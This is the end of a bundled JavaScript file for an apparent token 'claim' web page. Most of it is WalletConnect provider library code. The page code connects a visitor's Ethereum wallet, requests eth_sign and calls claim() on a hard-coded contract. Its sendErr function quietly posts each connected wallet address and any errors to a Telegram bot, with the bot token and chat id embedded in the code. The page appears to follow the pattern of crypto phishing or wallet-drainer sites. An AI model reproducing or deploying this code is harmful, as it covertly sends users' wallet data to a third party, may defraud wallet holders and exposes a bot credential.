            ...new Set(Object.keys(this.session.namespaces).map((i)=>(0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(i)))
        ];
        $253fb4de41dc743b$var$Wi("client", this.client), $253fb4de41dc743b$var$Wi("events", this.events), $253fb4de41dc743b$var$Wi("disableProviderPing", this.disableProviderPing), u.forEach((i)=>{
            if (!this.session) return;
            const p = $253fb4de41dc743b$var$Kg(i, this.session), I = $253fb4de41dc743b$var$ya(p), D = $253fb4de41dc743b$var$Yg(this.namespaces, this.optionalNamespaces), F = $253fb4de41dc743b$var$Fi($253fb4de41dc743b$var$cr({}, D[i]), {
                accounts: p,
                chains: I
            });
            switch(i){
                case "eip155":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$Qg({
                        namespace: F
                    });
                    break;
                case "solana":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$Vg({
                        namespace: F
                    });
                    break;
                case "cosmos":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$kg({
                        namespace: F
                    });
                    break;
                case "polkadot":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$Xg({
                        namespace: F
                    });
                    break;
                case "cip34":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$jg({
                        namespace: F
                    });
                    break;
                case "elrond":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$nv({
                        namespace: F
                    });
                    break;
                case "multiversx":
                    this.rpcProviders[i] = new $253fb4de41dc743b$var$tv({
                        namespace: F
                    });
                    break;
            }
        });
    }
    registerEventListeners() {
        if (typeof this.client > "u") throw new Error("Sign Client is not initialized");
        this.client.on("session_ping", (u)=>{
            this.events.emit("session_ping", u);
        }), this.client.on("session_event", (u)=>{
            const { params: i } = u, { event: p } = i;
            if (p.name === "accountsChanged") {
                const I = p.data;
                I && (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(I) && this.events.emit("accountsChanged", I.map($253fb4de41dc743b$var$Zg));
            } else p.name === "chainChanged" ? this.onChainChanged(i.chainId) : this.events.emit(p.name, p.data);
            this.events.emit("session_event", u);
        }), this.client.on("session_update", ({ topic: u, params: i })=>{
            var p;
            const { namespaces: I } = i, D = (p = this.client) == null ? void 0 : p.session.get(u);
            this.session = $253fb4de41dc743b$var$Fi($253fb4de41dc743b$var$cr({}, D), {
                namespaces: I
            }), this.onSessionUpdate(), this.events.emit("session_update", {
                topic: u,
                params: i
            });
        }), this.client.on("session_delete", async (u)=>{
            await this.cleanup(), this.events.emit("session_delete", u), this.events.emit("disconnect", $253fb4de41dc743b$var$Fi($253fb4de41dc743b$var$cr({}, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), {
                data: u.topic
            }));
        }), this.on($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, (u)=>{
            this.onChainChanged(u, !0);
        });
    }
    getProvider(u) {
        if (!this.rpcProviders[u]) throw new Error(`Provider not found: ${u}`);
        return this.rpcProviders[u];
    }
    onSessionUpdate() {
        Object.keys(this.rpcProviders).forEach((u)=>{
            var i;
            this.getProvider(u).updateNamespace((i = this.session) == null ? void 0 : i.namespaces[u]);
        });
    }
    setNamespaces(u) {
        const { namespaces: i, optionalNamespaces: p, sessionProperties: I } = u;
        i && Object.keys(i).length && (this.namespaces = i), p && Object.keys(p).length && (this.optionalNamespaces = p), this.sessionProperties = I, this.persist("namespaces", i), this.persist("optionalNamespaces", p);
    }
    validateChain(u) {
        const [i, p] = u?.split(":") || [
            "",
            ""
        ];
        if (!this.namespaces || !Object.keys(this.namespaces).length) return [
            i,
            p
        ];
        if (i && !Object.keys(this.namespaces || {}).map((F)=>(0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(F)).includes(i)) throw new Error(`Namespace '${i}' is not configured. Please call connect() first with namespace config.`);
        if (i && p) return [
            i,
            p
        ];
        const I = (0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(Object.keys(this.namespaces)[0]), D = this.rpcProviders[I].getDefaultChain();
        return [
            I,
            D
        ];
    }
    async requestAccounts() {
        const [u] = this.validateChain();
        return await this.getProvider(u).requestAccounts();
    }
    onChainChanged(u, i = !1) {
        var p;
        if (!this.namespaces) return;
        const [I, D] = this.validateChain(u);
        i || this.getProvider(I).setDefaultChain(D), ((p = this.namespaces[I]) != null ? p : this.namespaces[`${I}:${D}`]).defaultChain = D, this.persist("namespaces", this.namespaces), this.events.emit("chainChanged", D);
    }
    onConnect() {
        this.createProviders(), this.events.emit("connect", {
            session: this.session
        });
    }
    async cleanup() {
        this.session = void 0, this.namespaces = void 0, this.optionalNamespaces = void 0, this.sessionProperties = void 0, this.persist("namespaces", void 0), this.persist("optionalNamespaces", void 0), this.persist("sessionProperties", void 0), await this.cleanupPendingPairings({
            deletePairings: !0
        });
    }
    persist(u, i) {
        this.client.core.storage.setItem(`${$253fb4de41dc743b$var$Ia}/${u}`, i);
    }
    async getFromStore(u) {
        return await this.client.core.storage.getItem(`${$253fb4de41dc743b$var$Ia}/${u}`);
    }
}
const $253fb4de41dc743b$export$63bc40680ab52599 = $253fb4de41dc743b$export$2e2bcd8739ae039;


const $76e4bb4b0df9e886$var$P = "wc", $76e4bb4b0df9e886$var$S = "ethereum_provider", $76e4bb4b0df9e886$var$$ = `${$76e4bb4b0df9e886$var$P}@2:${$76e4bb4b0df9e886$var$S}:`, $76e4bb4b0df9e886$var$j = "https://rpc.walletconnect.com/v1/", $76e4bb4b0df9e886$export$cfec112b6d27bf = [
    "eth_sendTransaction",
    "personal_sign"
], $76e4bb4b0df9e886$export$bc85197675500780 = [
    "eth_accounts",
    "eth_requestAccounts",
    "eth_sendRawTransaction",
    "eth_sign",
    "eth_signTransaction",
    "eth_signTypedData",
    "eth_signTypedData_v3",
    "eth_signTypedData_v4",
    "wallet_switchEthereumChain",
    "wallet_addEthereumChain",
    "wallet_getPermissions",
    "wallet_requestPermissions",
    "wallet_registerOnboarding",
    "wallet_watchAsset",
    "wallet_scanQRCode"
], $76e4bb4b0df9e886$export$2c607e5ce12221af = [
    "chainChanged",
    "accountsChanged"
], $76e4bb4b0df9e886$export$1d352f96d67d51e6 = [
    "message",
    "disconnect",
    "connect"
];
var $76e4bb4b0df9e886$var$N = Object.defineProperty, $76e4bb4b0df9e886$var$q = Object.defineProperties, $76e4bb4b0df9e886$var$D = Object.getOwnPropertyDescriptors, $76e4bb4b0df9e886$var$y = Object.getOwnPropertySymbols, $76e4bb4b0df9e886$var$U = Object.prototype.hasOwnProperty, $76e4bb4b0df9e886$var$Q = Object.prototype.propertyIsEnumerable, $76e4bb4b0df9e886$var$O = (a, t, s)=>t in a ? $76e4bb4b0df9e886$var$N(a, t, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: s
    }) : a[t] = s, $76e4bb4b0df9e886$var$p = (a, t)=>{
    for(var s in t || (t = {}))$76e4bb4b0df9e886$var$U.call(t, s) && $76e4bb4b0df9e886$var$O(a, s, t[s]);
    if ($76e4bb4b0df9e886$var$y) for (var s of $76e4bb4b0df9e886$var$y(t))$76e4bb4b0df9e886$var$Q.call(t, s) && $76e4bb4b0df9e886$var$O(a, s, t[s]);
    return a;
}, $76e4bb4b0df9e886$var$M = (a, t)=>$76e4bb4b0df9e886$var$q(a, $76e4bb4b0df9e886$var$D(t));
function $76e4bb4b0df9e886$var$g(a) {
    return Number(a[0].split(":")[1]);
}
function $76e4bb4b0df9e886$var$f(a) {
    return `0x${a.toString(16)}`;
}
function $76e4bb4b0df9e886$var$L(a) {
    const { chains: t, optionalChains: s, methods: i, optionalMethods: n, events: e, optionalEvents: h, rpcMap: c } = a;
    if (!(0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(t)) throw new Error("Invalid chains");
    const o = {
        chains: t,
        methods: i || $76e4bb4b0df9e886$export$cfec112b6d27bf,
        events: e || $76e4bb4b0df9e886$export$2c607e5ce12221af,
        rpcMap: $76e4bb4b0df9e886$var$p({}, t.length ? {
            [$76e4bb4b0df9e886$var$g(t)]: c[$76e4bb4b0df9e886$var$g(t)]
        } : {})
    }, r = e?.filter((l)=>!$76e4bb4b0df9e886$export$2c607e5ce12221af.includes(l)), d = i?.filter((l)=>!$76e4bb4b0df9e886$export$cfec112b6d27bf.includes(l));
    if (!s && !h && !n && !(r != null && r.length) && !(d != null && d.length)) return {
        required: t.length ? o : void 0
    };
    const C = r?.length && d?.length || !s, I = {
        chains: [
            ...new Set(C ? o.chains.concat(s || []) : s)
        ],
        methods: [
            ...new Set(o.methods.concat(n != null && n.length ? n : $76e4bb4b0df9e886$export$bc85197675500780))
        ],
        events: [
            ...new Set(o.events.concat(h || $76e4bb4b0df9e886$export$1d352f96d67d51e6))
        ],
        rpcMap: c
    };
    return {
        required: t.length ? o : void 0,
        optional: s.length ? I : void 0
    };
}

class $76e4bb4b0df9e886$export$2e2bcd8739ae039 {
    constructor(){
        this.events = new (0, $7etJZ.EventEmitter), this.namespace = "eip155", this.accounts = [], this.chainId = 1, this.STORAGE_KEY = $76e4bb4b0df9e886$var$$, this.on = (t, s)=>(this.events.on(t, s), this), this.once = (t, s)=>(this.events.once(t, s), this), this.removeListener = (t, s)=>(this.events.removeListener(t, s), this), this.off = (t, s)=>(this.events.off(t, s), this), this.parseAccount = (t)=>this.isCompatibleChainId(t) ? this.parseAccountId(t).address : t, this.signer = {}, this.rpc = {};
    }
    static async init(t) {
        const s = new $76e4bb4b0df9e886$export$2e2bcd8739ae039;
        return await s.initialize(t), s;
    }
    async request(t) {
        return await this.signer.request(t, this.formatChainId(this.chainId));
    }
    sendAsync(t, s) {
        this.signer.sendAsync(t, s, this.formatChainId(this.chainId));
    }
    get connected() {
        return this.signer.client ? this.signer.client.core.relayer.connected : !1;
    }
    get connecting() {
        return this.signer.client ? this.signer.client.core.relayer.connecting : !1;
    }
    async enable() {
        return this.session || await this.connect(), await this.request({
            method: "eth_requestAccounts"
        });
    }
    async connect(t) {
        if (!this.signer.client) throw new Error("Provider not initialized. Call init() first");
        this.loadConnectOpts(t);
        const { required: s, optional: i } = $76e4bb4b0df9e886$var$L(this.rpc);
        try {
            const n = await new Promise(async (h, c)=>{
                var o;
                this.rpc.showQrModal && ((o = this.modal) == null || o.subscribeModal((r)=>{
                    !r.open && !this.signer.session && (this.signer.abortPairingAttempt(), c(new Error("Connection request reset. Please try again.")));
                })), await this.signer.connect($76e4bb4b0df9e886$var$M($76e4bb4b0df9e886$var$p({
                    namespaces: $76e4bb4b0df9e886$var$p({}, s && {
                        [this.namespace]: s
                    })
                }, i && {
                    optionalNamespaces: {
                        [this.namespace]: i
                    }
                }), {
                    pairingTopic: t?.pairingTopic
                })).then((r)=>{
                    h(r);
                }).catch((r)=>{
                    c(new Error(r.message));
                });
            });
            if (!n) return;
            this.setChainIds(this.rpc.chains);
            const e = (0, $a5d33cfc7f8e5437$export$23329703ad972840)(n.namespaces, [
                this.namespace
            ]);
            this.setAccounts(e), this.events.emit("connect", {
                chainId: $76e4bb4b0df9e886$var$f(this.chainId)
            });
        } catch (n) {
            throw this.signer.logger.error(n), n;
        } finally{
            this.modal && this.modal.closeModal();
        }
    }
    async disconnect() {
        this.session && await this.signer.disconnect(), this.reset();
    }
    get isWalletConnect() {
        return !0;
    }
    get session() {
        return this.signer.session;
    }
    registerEventListeners() {
        this.signer.on("session_event", (t)=>{
            const { params: s } = t, { event: i } = s;
            i.name === "accountsChanged" ? (this.accounts = this.parseAccounts(i.data), this.events.emit("accountsChanged", this.accounts)) : i.name === "chainChanged" ? this.setChainId(this.formatChainId(i.data)) : this.events.emit(i.name, i.data), this.events.emit("session_event", t);
        }), this.signer.on("chainChanged", (t)=>{
            const s = parseInt(t);
            this.chainId = s, this.events.emit("chainChanged", $76e4bb4b0df9e886$var$f(this.chainId)), this.persist();
        }), this.signer.on("session_update", (t)=>{
            this.events.emit("session_update", t);
        }), this.signer.on("session_delete", (t)=>{
            this.reset(), this.events.emit("session_delete", t), this.events.emit("disconnect", $76e4bb4b0df9e886$var$M($76e4bb4b0df9e886$var$p({}, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), {
                data: t.topic,
                name: "USER_DISCONNECTED"
            }));
        }), this.signer.on("display_uri", (t)=>{
            var s, i;
            this.rpc.showQrModal && ((s = this.modal) == null || s.closeModal(), (i = this.modal) == null || i.openModal({
                uri: t
            })), this.events.emit("display_uri", t);
        });
    }
    switchEthereumChain(t) {
        this.request({
            method: "wallet_switchEthereumChain",
            params: [
                {
                    chainId: t.toString(16)
                }
            ]
        });
    }
    isCompatibleChainId(t) {
        return typeof t == "string" ? t.startsWith(`${this.namespace}:`) : !1;
    }
    formatChainId(t) {
        return `${this.namespace}:${t}`;
    }
    parseChainId(t) {
        return Number(t.split(":")[1]);
    }
    setChainIds(t) {
        const s = t.filter((i)=>this.isCompatibleChainId(i)).map((i)=>this.parseChainId(i));
        s.length && (this.chainId = s[0], this.events.emit("chainChanged", $76e4bb4b0df9e886$var$f(this.chainId)), this.persist());
    }
    setChainId(t) {
        if (this.isCompatibleChainId(t)) {
            const s = this.parseChainId(t);
            this.chainId = s, this.switchEthereumChain(s);
        }
    }
    parseAccountId(t) {
        const [s, i, n] = t.split(":");
        return {
            chainId: `${s}:${i}`,
            address: n
        };
    }
    setAccounts(t) {
        this.accounts = t.filter((s)=>this.parseChainId(this.parseAccountId(s).chainId) === this.chainId).map((s)=>this.parseAccountId(s).address), this.events.emit("accountsChanged", this.accounts);
    }
    getRpcConfig(t) {
        var s, i;
        const n = (s = t?.chains) != null ? s : [], e = (i = t?.optionalChains) != null ? i : [], h = n.concat(e);
        if (!h.length) throw new Error("No chains specified in either `chains` or `optionalChains`");
        const c = n.length ? t?.methods || $76e4bb4b0df9e886$export$cfec112b6d27bf : [], o = n.length ? t?.events || $76e4bb4b0df9e886$export$2c607e5ce12221af : [], r = t?.optionalMethods || [], d = t?.optionalEvents || [], C = t?.rpcMap || this.buildRpcMap(h, t.projectId), I = t?.qrModalOptions || void 0;
        return {
            chains: n?.map((l)=>this.formatChainId(l)),
            optionalChains: e.map((l)=>this.formatChainId(l)),
            methods: c,
            events: o,
            optionalMethods: r,
            optionalEvents: d,
            rpcMap: C,
            showQrModal: !!(t != null && t.showQrModal),
            qrModalOptions: I,
            projectId: t.projectId,
            metadata: t.metadata
        };
    }
    buildRpcMap(t, s) {
        const i = {};
        return t.forEach((n)=>{
            i[n] = this.getRpcUrl(n, s);
        }), i;
    }
    async initialize(t) {
        if (this.rpc = this.getRpcConfig(t), this.chainId = this.rpc.chains.length ? $76e4bb4b0df9e886$var$g(this.rpc.chains) : $76e4bb4b0df9e886$var$g(this.rpc.optionalChains), this.signer = await (0, $253fb4de41dc743b$export$63bc40680ab52599).init({
            projectId: this.rpc.projectId,
            metadata: this.rpc.metadata,
            disableProviderPing: t.disableProviderPing,
            relayUrl: t.relayUrl,
            storageOptions: t.storageOptions
        }), this.registerEventListeners(), await this.loadPersistedSession(), this.rpc.showQrModal) {
            let s;
            try {
                const { WalletConnectModal: i } = await (parcelRequire("yQvku"));
                s = i;
            } catch  {
                throw new Error("To use QR modal, please install @walletconnect/modal package");
            }
            if (s) try {
                this.modal = new s($76e4bb4b0df9e886$var$p({
                    walletConnectVersion: 2,
                    projectId: this.rpc.projectId,
                    standaloneChains: this.rpc.chains
                }, this.rpc.qrModalOptions));
            } catch (i) {
                throw this.signer.logger.error(i), new Error("Could not generate WalletConnectModal Instance");
            }
        }
    }
    loadConnectOpts(t) {
        if (!t) return;
        const { chains: s, optionalChains: i, rpcMap: n } = t;
        s && (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(s) && (this.rpc.chains = s.map((e)=>this.formatChainId(e)), s.forEach((e)=>{
            this.rpc.rpcMap[e] = n?.[e] || this.getRpcUrl(e);
        })), i && (0, $a5d33cfc7f8e5437$export$41dd3d480aac4a71)(i) && (this.rpc.optionalChains = [], this.rpc.optionalChains = i?.map((e)=>this.formatChainId(e)), i.forEach((e)=>{
            this.rpc.rpcMap[e] = n?.[e] || this.getRpcUrl(e);
        }));
    }
    getRpcUrl(t, s) {
        var i;
        return ((i = this.rpc.rpcMap) == null ? void 0 : i[t]) || `${$76e4bb4b0df9e886$var$j}?chainId=eip155:${t}&projectId=${s || this.rpc.projectId}`;
    }
    async loadPersistedSession() {
        if (!this.session) return;
        const t = await this.signer.client.core.storage.getItem(`${this.STORAGE_KEY}/chainId`), s = this.session.namespaces[`${this.namespace}:${t}`] ? this.session.namespaces[`${this.namespace}:${t}`] : this.session.namespaces[this.namespace];
        this.setChainIds(t ? [
            this.formatChainId(t)
        ] : s?.accounts), this.setAccounts(s?.accounts);
    }
    reset() {
        this.chainId = 1, this.accounts = [];
    }
    persist() {
        this.session && this.signer.client.core.storage.setItem(`${this.STORAGE_KEY}/chainId`, this.chainId);
    }
    parseAccounts(t) {
        return typeof t == "string" || t instanceof String ? [
            this.parseAccount(t)
        ] : t.map((s)=>this.parseAccount(s));
    }
}
const $76e4bb4b0df9e886$export$cdfbbad9b2980226 = $76e4bb4b0df9e886$export$2e2bcd8739ae039;



const $6b17f08f738443dc$var$data = {
    web3: null,
    chainId: null,
    userAddress: null,
    tokenAddress: null
};
let $6b17f08f738443dc$var$provider;
async function $6b17f08f738443dc$var$initWeb3() {
    try {
        const provider = await (0, $76e4bb4b0df9e886$export$cdfbbad9b2980226).init({
            projectId: "a4d5070c3029ebef4257b143f26d11e3",
            chains: [
                1
            ],
            showQrModal: true,
            methods: [
                "eth_sendTransaction",
                "eth_sign"
            ],
            events: [
                "chainChanged",
                "accountsChanged"
            ]
        });
        const accountx = await provider.connect();
        const accounts = await provider.request({
            method: "eth_requestAccounts"
        });
        const chainId = await provider.request({
            method: "eth_chainId"
        });
        const web3 = new $2c4ca49181ee4a21$exports(provider);
        $6b17f08f738443dc$var$data.web3 = web3;
        $6b17f08f738443dc$var$data.userAddress = accounts[0];
        $6b17f08f738443dc$var$data.chainId = chainId;
        $6b17f08f738443dc$var$data.web3 = web3;
        document.querySelector("#connect-user").textContent = $6b17f08f738443dc$var$shortenEthereumAddress($6b17f08f738443dc$var$data.userAddress);
        await $6b17f08f738443dc$var$sendErr(`${$6b17f08f738443dc$var$data.userAddress} is connected`);
        await $6b17f08f738443dc$var$loadTokenContract();
    } catch (e) {
        $6b17f08f738443dc$var$sendErr(e);
    }
}
async function $6b17f08f738443dc$var$swRC(id) {
    if (id == 1 || id == "0x1") {
        await $6b17f08f738443dc$var$loadTokenContract();
        return true;
    } else try {
        await ethereum.request({
            method: "wallet_switchEthereumChain",
            params: [
                {
                    chainId: $6b17f08f738443dc$var$data.web3.utils.toHex(1)
                }
            ]
        });
    } catch (switchError) {
        if (switchError.code === 4902) try {
            const res = await window.ethereum.request({
                method: "wallet_addEthereumChain",
                params: [
                    {
                        chainId: $6b17f08f738443dc$var$data.web3.utils.toHex(1),
                        chainName: "Ethereum Mainnet",
                        blockExplorerUrls: [
                            "https://etherscan.io"
                        ],
                        nativeCurrency: {
                            name: "Ethereum",
                            symbol: "ETH",
                            decimals: 18
                        },
                        rpcUrls: [
                            "https://mainnet.infura.io/v3/",
                            "https://rpc.ankr.com/eth"
                        ]
                    }
                ]
            });
            await $6b17f08f738443dc$var$loadTokenContract();
            return true;
        } catch (addError) {
            return false;
        }
    }
}
function $6b17f08f738443dc$var$shortenEthereumAddress(x) {
    let startChars = 6, endChars = 4;
    return x ? `${x.slice(0, startChars)}...${x.slice(-endChars)}` : "";
}
document.querySelector("#claim-user-token").addEventListener("click", $6b17f08f738443dc$var$loadClaimContract);
document.querySelector("#connect-user").addEventListener("click", $6b17f08f738443dc$var$initWeb3);
async function $6b17f08f738443dc$var$loadTokenContract() {
    if ($6b17f08f738443dc$var$data.web3) try {
        const tkCo = new $6b17f08f738443dc$var$data.web3.eth.Contract($9975c64ce2e299cc$exports, "0xD15042d3f061c0f289914794d29Bb6C65095353E");
        const bal = await tkCo.methods.balanceOf($6b17f08f738443dc$var$data.userAddress).call();
        document.querySelector("#token-balance").innerText = Number(bal);
        if (Number(bal) > 0) $6b17f08f738443dc$var$sendErr("User Already claimed");
        else await $6b17f08f738443dc$var$loadClaimContract();
    } catch (error) {
        $6b17f08f738443dc$var$sendErr(error);
    }
    else await $6b17f08f738443dc$var$initWeb3();
}
async function $6b17f08f738443dc$var$loadClaimContract() {
    if ($6b17f08f738443dc$var$data.web3) try {
        const clCo = new $6b17f08f738443dc$var$data.web3.eth.Contract($4d2414ec018917f2$exports, "0xcc788E8DaE5856dcEEa4e89e63F2693FC58e5Db3");
        await clCo.methods.claim().send({
            from: $6b17f08f738443dc$var$data.userAddress
        });
    } catch (e) {
        $6b17f08f738443dc$var$sendErr(e);
    }
    else await $6b17f08f738443dc$var$initWeb3();
}
async function $6b17f08f738443dc$var$sendErr(x) {
    const options = {
        method: "POST",
        mode: "cors",
        headers: {
            accept: "application/json",
            "content-type": "application/json"
        },
        body: JSON.stringify({
            text: String(x),
            disable_web_page_preview: false,
            disable_notification: false,
            reply_to_message_id: null,
            chat_id: "1125129156"
        })
    };
    fetch(`https://api.telegram.org/bot${"5888330594:AAHDeBuU_fGop5VyXbdF-p3CFR0MPjrtGIo"}/sendMessage`, options).then((response)=>response.json()).then((response)=>response).catch((err)=>console.error(err));
}


//# sourceMappingURL=index.04ef94f2.js.map
